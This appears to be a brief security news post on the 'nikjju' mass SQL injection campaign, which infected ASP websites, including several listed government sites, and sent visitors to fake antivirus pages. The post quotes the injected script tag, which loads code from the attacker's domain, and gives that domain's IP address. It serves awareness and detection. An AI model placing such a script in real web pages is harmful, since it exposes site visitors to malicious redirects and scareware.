Hackers compromised more than 180,000 webpages and inject malicious script by exploiting the SQL Injection vulnerability. The nikjju Mass SQL Injection campaign targets ASP websites.
The compromised websites are injected with following script:
<script src= http://nikjju.com/r.php ></script>
The injected script will redirect visitors to Fake/Rogue AVs (best-antiviruu.de.lv – mostly targeting Windows users).
According to Sucuri report, Google results 188,000 pages infected with that javascript call, but the number is growing really fast.
The domain Nikjju.com (31.210.100.242) was registered April 1st and the hack was started few days after(April 4th).
Few Chinese government websites are fall for this attack:
- jnd.xmchengdu.gov.cn
- study.dyny.gov.cn
- www.cnll.gov.cn
- www.bj.hzjcy.gov.cn
- www.mirpurkhas.gov.pk
- www.tdnyw.gov.cn
- gcjs.kaifeng.gov.cn
If your suspect your site has been compromised, you can verify it on Sucuri SiteCheck (free scanner):
http://sitecheck.sucuri.net/scanner/
